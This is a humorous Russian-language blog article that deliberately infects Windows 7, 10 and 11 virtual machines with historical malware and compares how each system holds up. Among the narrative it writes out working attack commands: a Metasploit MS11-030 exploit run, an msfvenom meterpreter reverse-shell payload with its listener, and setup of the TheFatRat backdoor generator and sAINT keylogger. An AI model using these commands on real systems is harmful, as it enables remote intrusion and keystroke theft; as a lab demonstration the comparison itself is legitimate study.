Предисловие
А, ой. Вы уже здесь? Приветики. Что-то я не в настроении, но да ладно. Захотелось организовать продолжение того самого формата, в котором мы будем уничтожать различные шинудоусы всяким вредоносным ПО, а после и определять какая из этих систем надежней, безопасней и выносливей. В прошлом выпуске мы сравнивали новую 11-ю и, уже старенькую, её младшую сестрицу 10-тку. Сразу предупрежу, что это плюс-минус юморной и разговорный формат, главной целью которого есть донести результаты сравнения и поднять вам настроение.
Обе показали себя очень достойно, но в конце произошло то, чего я не ожидал, более поздняя и стабильная версия оказалась слабее по безопасности и выносливости, в итоге просто умерла с красным экраном, если вам интересно, то можете ознакомиться с результатами и самой работой здесь:
Итак, сегодня сравнениям… Стоп. Прежде чем начнем нужно в обязательном порядке уронить вот это сюда:
Дисклеймер
На самом деле я против зла и то, что я покажу вам далее, может быть, практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект — это знания.
И напоминаю, что в рамках этой связки статей у нас действует конкурс на 5.555 рублей, а связан он с отсылками в моих работах: культовые фильмы, анимешки да и просто мемы с играми. Узнали? Пишите комментарий, ведь тот, кто раздает все пасхалки - получит денежку.
Магическая битва: последний Виндоус - противостояние: Windows 11 vs Win 7&10 или как безымянный вирус положил всех на лопатки
А теперь можем начинать, сегодня я решил подойти к уничтожению более продумано. Безусловно, качая из интернета всякую пакость, систему можно убить, это даже весело, но теперь становимся серьезными, запускать будем всякие вредоносы, имеющие исторический бэкграунд и популярные. Список я ещё не составил, но оставлю его ниже с подробным пояснением о свойствах, особенностях и так далее.
А сейчас о правилах по которым будет проходить наше магическое состязание, кстати сравниваем сегодня целых три системы: седьмой виндовс ( мой фаворит, хотя мне кажется умрет он первым), десятый и одиннадцатый ( зло во плоти, переустановка которого занимает два часа). Пунктики:
- Использоваться будет среда VMware, так как показала себя более стабильной и на ней 11-я не морочит голову мне особо.
- Каждая из подопытных будет использовать равное количество оперативной памяти, если в прошлом выпуске это было - 4 ГБ, то теперь 6, и по два ядра процессора с возможностью загрузки под 100%. Конфигурация моего ПК-основы: 16 ГБ оперативной памяти, i3-11xxG4 Tiger Lake, 4 ядра, 8 потоков и максимальная скорость 4 Ггц.
- Тесты будут производиться поочередно, чтобы снизить эффект взаимного влияния. Это означает, что сами тесты будут произведены не в одно время, а в разное, дабы процессор и оперативная память моего ПК были максимально не загруженными.
- На каждую из исследуемых ОС будет загружено равное количество вредоносных программ и равное количество потенциально опасных файлов из одних и тех же сайтов, список предоставлю позже.
- Тестируемые не будут никак оптимизированы или настроены, разрушение будет происходить сразу же после установки.
- После тотального заражения двух систем, если они обе доживут, то проведем простенький бенчмарк производительности и посмотрим, какая держалась лучше.
- Использоваться будут самые новые ISO образы из официального сайта Майкрософт. Никаких торрентов и сборок, только то, что предоставил нам великий Билли Гейтс. Ну кроме 7-ой, официальной версии которой теперь нет на сайте, потому будет использован максимально приближенный к оригиналу репак.
- На всех системах отключаются защитные функции, если в десятой и одиннадцатой это Дефендер, то седьмой просто отключаем Брандмауэр.
- Во время чтения, обязательно включайте фонк, как фоновую музыку, воспринимайте написанное больше как шутку, хотя и о серьёзных вещах говорим.
Среди именитых выберем следующие:
- Конфикер - если не ошибаюсь, по нему у меня где-то лежит готовая статья из цикла Исторической вирусологии. Червь из 2008 года, которого простым назвать сложно, никаких особо негативных эффектов не имел, за исключением последних версий, которые подгружали различные бэкдоры и нагружали систему до предела. Вызывает сильное торможение в работе системы.
- 42.zip - легенда. Архив смерти, в основе просто тормозит систему, загружая оперативную памятью, может вызывать различные сбои в работе ОС, но все фиксится банальным перезапуском. Использовался для перегрузки антивирусного ПО. Полностью распакованный архив весит 4.5 петабайта. Сюда также включу картинку, размером в 1 миллион пикселей. Сравним, какая система будет грузиться больше от такого.
- Ванна Край, Петя, Торрент Локер, БэдРебит. В представлении не нуждаются. Заблокируем систему, после попытаемся её восстановить.
- Zeus Gameover - троян для кражи банковский и учетных данных 2014 года.
- Различные бэкдоры из Кали Линукс: Метасплоит, Фетрат.
- Stuxnet – это компьютерный червь в 500 килобайт, который заразил программное обеспечение по меньшей мере 14 промышленных предприятий Ирана, в том числе и завод по обогащению урана. По правде хотелось мне написать о нем статью, может быть она и выйдет, интересный представитель.
- Win32/Genasom/Amnesia - изначально был вариантов программы-вымогателя, но после что-то пошло не так и он начал просто убивать систему, вызывая дикие эффекты глитча на мониторе и страшные звуки.
- Скрытый майнер - здесь возьмем просто какой-то из ГитХаб и сгенерируем исполняемый файлик.
- NJRAT - ну ещё одна легенда, представитель типичного троянца бэкдора для скрытого администрирования, в клиенте, если я не ошибаюсь есть куча разнообразных функций, ними и побалуемся.
- Возьмем различные кейлоггеры, тоже из Гитхаба, типа СпайБи или как его там, забыл уже.
- Скачаем Майкрафт, МедиаГет и Торрент!
- Monoxide.exe и его аналоги, это у нас различные страшные вирусы-скримеры, которые в некоторых случаях могут крашить систему.
- Бонзи Килла, Mrs Major всех версий, ставлю их в конец из-за прошлого результата на 10тке.
Короче врубайте фонк и погнали.
Таков вот он у нас, порядок разрушения, но сперва давайте проверим только установленную Семерку с помощью сканера уязвимостей, до боли интересно, что из этого выйдет. К сожалению, это не самая новая версия, посему может и будут какие-то критические дыры, поехали:
Код:
systemctl start nessusd.serviceКак же классно, когда система ставится без особого вмешательства: ни реестр редактировать, ни изменять что-то. Сразу же после запуска была обнаружена критическая уязвимость MS11-030 в службе Kerberos, эксплуатация этой дыры позволяет получить несанкционированный доступ к устройству. Вот так поворот. Давайте запустим Метасплоит и глянем есть ли что-то под эту уязвимость, если есть, попытаемся провести эксплуатацию.
Код:
search ms11-030В ответе видим, что действительно эксплоит имеется, потому выберем его и запустим:
Код:
use 0
show options
set rhosts 192.168.42.131
runОтвет видите на скрине, эту дыру нужно использовать в комплексе, что позволит выполнить с помощью DNS запроса любой код на машине жертвы, делать этого мы не будем, по крайней мере в рамках этой статьи.
Раз уж начали издеваться над семеркой, то давайте качать Торрент, Медиагет и Майнкрафт, если последний это лишь шутка, то первые два могут считаться полноценными майнерами, по крайней мере так я их определяю. Заодно проверим той же полезной нагрузкой, что и в прошлом выпуске получение реверс шелла:
Код:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.42.129 LPORT=4444 -f exe -a x64 -o /home/infosecaddicts/codeby.exeА после и создадим слушатель на порту 4444:
Код:
use exploit/multi/handler
set lhost 192.168.42.129
set payload
windows/x64/meterpreter/reverse_tcpНу и ничего необычного, этот шелл мы используем для того, чтобы подгружать на систему другие вредоносные скрипты. Пока Медиагет качается, давайте теперь воспользуемся Фэтрэтом и сгенерируем разные типа бэкдоров, запустим их и узнаем какое количество окажутся работоспособными, хотя мне кажется, что все.
Так как у меня из-за 11-й винды новый Кали, придется установить все заново:
Код:
git clone https://github.com/Screetsec/TheFatRat
cd TheFatRat/
bash setup.sh
fatratТем временем седьмой виндовс нас предупреждает, мол подключение не безопасно, не нужно переходить и качать этот ваш Медиагет, ну , а нам плевать. Конечно же нужно! Ага. Установщик выдал ошибку и закрылся, ну окей.
Параллельно наш генератор бэкдоров уже установлен, давайте смотреть, что здесь есть такого интересного. Подробно расписывать не стану, ибо займет слишком много времени, потому просто скажу, что выбрал из каждого пункта по одному бэкдору, все они используют примитивные полезные нагрузки и впоследствии все они были успешно запущены. Закрывать их сессии мы не будем.
Теперь установим кейлоггер Саинт, который уже когда-то фигурировал в моих статьях, единственным его нюансом есть то, что он требует установленную Джаву. Не просто так же я качал Майнкрафт, он автоматически ведь устанавливает все необходимые пакеты:
Код:
git clone https://github.com/tiagorlampert/sAINT.git
cd sAINT
chmod +x configure.sh
./configure.shНу и дальше интуитивно генерируем кейлоггер, здесь все просто, 1-2-3, временная почта и все готово.
Закинем готовый файлик на нашу машину и.. Запустился без каких-либо упреков и намеков, что что-то не так.
89 процессов, процессор грузится в фоновом режиме на 70%, м-м-м.. Окей, давайте попытаемся организовать работу Конфигера, первого в нашем списке. После запуска ничего не произошло, но да, он работает. В списке процессов он есть, но ничего не происходит, давайте попытаемся перейти в гугл и..
DNS был не найден. Ожидаемо, вирус работает, теперь запустим архив смерти - 42.zip. Хром блокирует загрузку данного архива, ибо считает его потенциально опасным, но нам плевать, откроем его.
Результат достаточно ожидаемый, ничего особо не произошло, но вот устройство начало дико тупить, процессор загружен на 100% и в итоге виндоус перезапускается. А и у нас закончилось место на диске.
Окей, а теперь картинка на один миллион пикселей, откроем её через пейнт, теперь это стандартное приложение занимает 5.5 гигабайт оперативной памяти. Неплохо, но ничего такого не произошло, хотя было бы памяти меньше, это скорее всего вызвало бы перезагрузку.
Zeus открылся без особых проблем и начал свою работу в скрытом виде.
А теперь самая веселая часть, начинаем запуски всякой всячины, которая вызывает глитчи и скримеры, первый в списке у нас monoxide.exe. Этот вредонос не имеет за собой кого-либо исторического бэкграунда и является, как и Миссис Мажор, исключительно программным обеспечением для тестов и не более. Рассматривать особо его не будем, давайте просто запустим и поглядим что станет с нашей виртуалкой на семерке. Кстати появился-то он не так и давно, 1-го апреля 2022 года. При попытке скачать архив, его блокирует лишь Хром, который обмануть - легче легкого. Ну-с, открываем, приложу запись экрана, чтобы вы могли понимать насколько это прикольный вирусняк.
Ну как вы видите, он не блокировал сочетание ctrl+alt+del, потому я вижу возможным переключаться между пользователями и попытаться реанимировать машину, но после вынужденной перезагрузки, все, что мы можем видеть - это вот этот мерцающий цветной экран. Также вирус не давал воспользоваться диспетчером напрямую и издавал звуки, которые просто взрывают перепонки. Так как системе даем лишь один шанс, то на этом мучения семерки окончены.
Здесь приведу небольшие итоги тестов на Виндовс 10:
- Архив смерти и картинки, которые могли быть потенциально опасными, были уничтожены дефендером, даже в выключенном состоянии.
- В прошлой статье мы уже проводили сканирование на наличие уязвимостей, особо опасных нет, результаты можете глянуть в предыдущей статье.
- Конфикер выдал ошибку VBS скрипта и не был запущен.
- Струкс нет и Зеус аналогично потерпели неудачу. Последний лишь запустился и висел процессом в 1КБ, но явно не выполнял своих функций.
- Без особых проблем, но с несколькими предупреждениями от Дефендера, был запущен NJRAT.
- Саинт был запущен без особых проблем, единственный его минус - зависимость от библиотек Джавы.
- Медиагет и Торрент работают.
- С вредоносами от Метасплоита и Фетрет - проблем нет, запущены успешно.
Так-с, пришло время Монооксида, хотел сказать я, но тут вспомнил, что хочу попытаться поставить и удалить популярные винлокеры. Первым у нас становится, нашумевший в 2017 году - Петя. Поехали.
Видеоотчет о Виндоус 10:
Сразу же после запуска проходит несколько минут и машина перезагружается, далее мы видим окошко шифрования, а после открывается вот этот черепок с требованием выкупа. И здесь уже никакой диспетчер задач не поможет. Дело все в том, что коды он генерирует в зависимости от модели жесткого диска, непосредственно взаимодействуя именно с ним, а не системой.
Но благо есть сайтец, который позволяет вбить модель вашего диска и прочую информацию о нем, а после получить валидный ключик для расшифровки. Просто скажете вы? Да, гениально, отвечу я. Остальные методы основаны на физическом извлечении жесткого диска, но у нас виртуалка, потому рассматривать их не станем.
Вообще существует метод просто не дать заразить вашу систему и сейчас расскажу и покажу как. Для начала давайте рассмотрим сам исполняемый файлик, сперва с помощью свойств. Ничего особого, даже версии нет, в этом плане бед рэббит преуспел больше.
А теперь давайте изучим его с помощью 7zip, простым открытием как архива, здесь мы видим те самые файлики, которые мы могли бы заметить при просмотре ПЕ заголовков, но нас это сейчас интересует мало. Нам нужен конкретно rdata, давайте выкинем его на рабочий стол и посмотрим, что из себя он представляет.
На первый взор может показаться, что здесь ничего дельного нет, но стоит перемотать в конец и видим три основных файла, которые инфицируются при запуске шифровальщика: shell32.dll, rundll32.dll и user32.dll. Все эти файлы можно просто удалить или поставить на них “только чтение” и Петя не сможет активироваться. Прикол. Пользуйтесь, хотя уже не актуально.
Бэдребит можно обезвредить таким же способом, только ДДЛки будут слегка другими.
А теперь перейдем к запуску монооксида, мне очень интересно, что станет с системой, постигнет ли её участь семерки? Айда проверим.
Кстати в отличие от семерки, десятка не предупреждает, что это потенциально опасный архив.
Ну, результат можете видеть на видео, здесь больше разнообразие эффектов, но итог такой же. Переходим к одиннадцатой.
Аналогично подвожу итоги в виде списка:
- Архив смерти и картинки, которые могли быть потенциально опасными, были уничтожены дефендером, даже в выключенном состоянии.
- В прошлой статье мы уже проводили сканирование на наличие уязвимостей, особо опасных нет, результаты можете глянуть в предыдущей статье.
- Конфикер выдал ошибку VBS скрипта и не был запущен.
- Струкс нет и Зеус аналогично потерпели неудачу. На этот раз никто не запустился даже.
- Без особых проблем, но с несколькими предупреждениями от Дефендера, был запущен NJRAT. Аналогично к десятке.
- Саинт был запущен без особых проблем, единственный его минус - зависимость от библиотек Джавы.
- Медиагет и Торрент работают.
- С вредоносами от Метасплоита и Фетрет - проблем нет, запущены успешно.
- Петя - отказался работать, просто ничего не происходит после его открытия. Аналогично с Бэд Рэббит, Ванна Край же шифрует данные, но не блокирует работу самой системы.
- Амнезия, которую мы так и не протестировали на устройствах выше, отказалась работать, при том, что выключенный дефендер всячески предупреждал о ней.
- БонзиКилла - не работает, а вот Миссис Мажор опять скопировалась на весь рабочий стол, но и больше ничего.
Призрачный 8-бит в ядре виндоус 11 делает свое дело на ура, система пусть и уязвима к банальным полезным нагрузкам, с помощью каких-то опасных вредоносов из прошлого ей не навредить никак.
Хотите узреть, как я вижу защитника виндоус 11? А вот:
Потому переходим к гвоздю нашей программы - Моноксид. Хотя я не ожидал, что он уничтожит две предыдущих системы, ладно.
Убавьте звук перед просмотром, пожалуйста, отчет о смерти Виндоус 11:
Да, но даже он не справился и система таки умерла, вот такое вот, видео можете глянуть или ниже или выше, смотря куда вставлю.
Итоги
И вот провели мы значится очередной батл между новым Виндоусом и двумя постарше. Не сказать, что меня удивили результаты, но Моноксид явно был создан специально для убийств всех систем, он запускается даже на 95-м виндоусе без особых проблем, хотя не может похвастаться таким обилием эффектов.
Итак, результаты. По моему скромному мнению, семерка оказалась из этой подборки хуже всех, к сожалению. Хотя это ожидаемо, мне почему-то за неё обиднее всего, ведь худшие результаты у как раз так у этой системы: Архивы смерти, Конфикер, Зеус и даже Бонзи Килла.
Могу здесь лишь сказать, что 11-я , пусть и она мне дико не нравится, порядком защищенней своих предшественников, она не допускает запуска потенциально опасного ПО, а даже если и запускает то, то старается предупредить своего пользователя. Даже в ситуации с Монооксидом, она выдала, что это потенциально опасный файл и запускать его нежелательно.
Конечно, есть желание сказать, что эта система не такая уж и плоха, но язык не поворачивается, а руки не пишут. В плане эргономики - худший, в плане защищенности - один из лучших и больше нет чего добавить.
А с вами был как всегда какой-то ноунейм под ником DeathDay и его маниакальное желание разрушать, всем спасибо. Мира всем, не прощаюсь.
